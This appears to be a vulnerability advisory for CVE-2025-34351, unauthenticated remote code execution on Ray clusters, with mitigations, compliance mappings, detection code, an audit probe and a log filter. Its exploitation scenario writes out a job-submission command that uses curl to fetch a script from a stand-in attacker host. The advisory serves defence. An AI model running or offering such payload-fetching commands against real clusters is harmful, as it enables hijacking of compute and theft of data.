CVE-2025-34351

GHSA-gx77-xgc2-4888 CRITICAL
Published November 27, 2025
CISO Take

Any Ray cluster reachable from your network can be compromised by default: no credentials are required to submit jobs and execute arbitrary code across the entire cluster. Enable RAY_AUTH_MODE=token immediately and firewall Ray ports (8265, 10001) from untrusted networks; there is no patch, only mitigation. This is being actively exploited in the wild: the ShadowRay 2.0 campaign hijacks AI compute clusters into self-propagating botnets.

Affected Systems

Package Ecosystem Vulnerable Range Patched
ray pip <= 2.52.0 No patch

Do you use ray? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.5%
chance of exploitation in 30 days
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

IMMEDIATE (do today):

  1. Audit all Ray deployments: test for unauthenticated access to port 8265 across your environment.
  2. Set RAY_AUTH_MODE=token in all Ray head node configurations and restart clusters.
  3. Firewall ports 8265 (dashboard), 10001 (client), and 8076 (metrics) to trusted CIDR ranges only; treat these as equivalent to database ports.

SHORT-TERM (this week):

  4. Rotate all secrets, API keys, and cloud credentials accessible from Ray cluster environments.
  5. Review Ray job submission history for unauthorized activity.
  6. Implement network segmentation isolating ML training infrastructure from internet-facing systems.
  7. Add IaC policy controls preventing Ray deployment without token auth enabled.

DETECTION:

Alert on unexpected Ray job submissions, unusual compute spikes on ML nodes, and outbound connections from Ray workers to unexpected IPs. Search logs for Ray Jobs API calls without Authorization headers.
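The audit step above can be sketched as a small probe. This is a minimal sketch, assuming the dashboard serves an HTTP route such as /api/version when authentication is off; the route name and status-code handling are assumptions to adapt to your deployment:

```python
import urllib.error
import urllib.request

def probe_ray_dashboard(host, port=8265, timeout=3):
    """Classify whether a Ray dashboard answers without credentials.
    The /api/version route is an assumption; substitute any endpoint
    your deployment actually serves."""
    url = f"http://{host}:{port}/api/version"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            # A 200 with no credentials supplied means the cluster is open
            return "OPEN" if resp.status == 200 else "UNEXPECTED"
    except urllib.error.HTTPError as exc:
        # 401/403 suggests token auth is rejecting the request
        return "AUTH_ENFORCED" if exc.code in (401, 403) else "UNEXPECTED"
    except OSError:
        # Connection refused / timed out: port is filtered or host is down
        return "UNREACHABLE"
```

Run this across your inventory of head-node addresses; any "OPEN" result should be treated as an exposed, exploitable cluster.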

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
Article 9 - Risk management system for high-risk AI
ISO 42001
A.6.2 - AI system risk management
A.8.2 - AI system security testing
A.9.1 - Information security for AI systems
A.9.4 - AI system access control
NIST AI RMF
GOVERN-1.2 - Risk tolerances are established for AI development and deployment
GOVERN-6.2 - Organizational policies address AI system cybersecurity
MANAGE-2.2 - Mechanisms are in place and applied for response to AI risk
OWASP LLM Top 10
LLM03:2025 - Supply Chain
LLM04:2025 - Data and Model Poisoning
LLM06:2025 - Excessive Agency

Technical Details

NVD Description

Anyscale Ray 2.52.0 contains an insecure default configuration in which token-based authentication for Ray management interfaces (including the dashboard and Jobs API) is disabled unless explicitly enabled by setting RAY_AUTH_MODE=token. In the default unauthenticated state, a remote attacker with network access to these interfaces can submit jobs and execute arbitrary code on the Ray cluster. NOTE: The vendor plans to enable token authentication by default in a future release. They recommend enabling token authentication to protect your cluster from unauthorized access.
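The mitigation above can be wired into a launch script. In this sketch, RAY_AUTH_MODE=token comes from the advisory, while the ray start flags and the loopback dashboard binding are assumptions (extra hardening, not a requirement):

```python
import os

def token_auth_head_command(dashboard_host="127.0.0.1"):
    """Build the env and argv for a Ray head node with token auth enforced.
    RAY_AUTH_MODE=token is the env var named in the advisory; binding the
    dashboard to loopback is an additional hardening assumption."""
    env = dict(os.environ)
    env["RAY_AUTH_MODE"] = "token"
    cmd = ["ray", "start", "--head", "--dashboard-host", dashboard_host]
    return env, cmd

# On the head node, hand the pair to subprocess.run(cmd, env=env, check=True)
```

Baking the env var into the launch wrapper (rather than setting it interactively) keeps the IaC policy control from step 7 enforceable.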

Exploitation Scenario

An adversary runs a Shodan/Censys scan for exposed Ray dashboards on port 8265, a trivial 5-minute operation. Upon finding an unauthenticated endpoint, they submit a malicious Python job via the Jobs API, e.g. ray job submit -- python -c 'import subprocess; subprocess.Popen(["curl", "attacker.com/bot.sh", "-o", "/tmp/x"])'. The job executes on all cluster nodes with the permissions of the Ray worker process, which in cloud environments typically carries attached IAM roles with broad S3/GCS/blob storage access. Within minutes the attacker has exfiltrated model weights and training data, installed a persistent backdoor, and enrolled the cluster in the ShadowRay 2.0 botnet, which then uses the compromised cluster to scan for and attack other exposed Ray instances, creating a self-propagating AI compute worm. The entire attack chain requires no AI/ML expertise, only awareness that Ray auth is off by default.
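The detection guidance (Ray Jobs API calls without Authorization headers) can be sketched as a log filter. The log format below ("METHOD PATH headers=h1;h2;...") is an assumption; adapt the parsing to whatever your reverse proxy or dashboard access log actually emits:

```python
import re

# Flag job-submission requests that arrived with no Authorization header.
# /api/jobs/ is the Jobs API submission path; the header-list log format
# is an assumption for illustration.
JOBS_SUBMIT = re.compile(r"POST\s+/api/jobs/?(\s|$)")

def unauthenticated_submissions(log_lines):
    return [
        line for line in log_lines
        if JOBS_SUBMIT.search(line) and "authorization" not in line.lower()
    ]

sample = [
    "POST /api/jobs/ headers=content-type",
    "POST /api/jobs/ headers=authorization;content-type",
    "GET /api/version headers=",
]
print(unauthenticated_submissions(sample))  # only the first line should match
```

Feeding such matches into an alerting pipeline covers the "Jobs API calls without Authorization headers" search described in the recommended actions.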

Timeline

Published
November 27, 2025
Last Modified
December 1, 2025
First Seen
March 24, 2026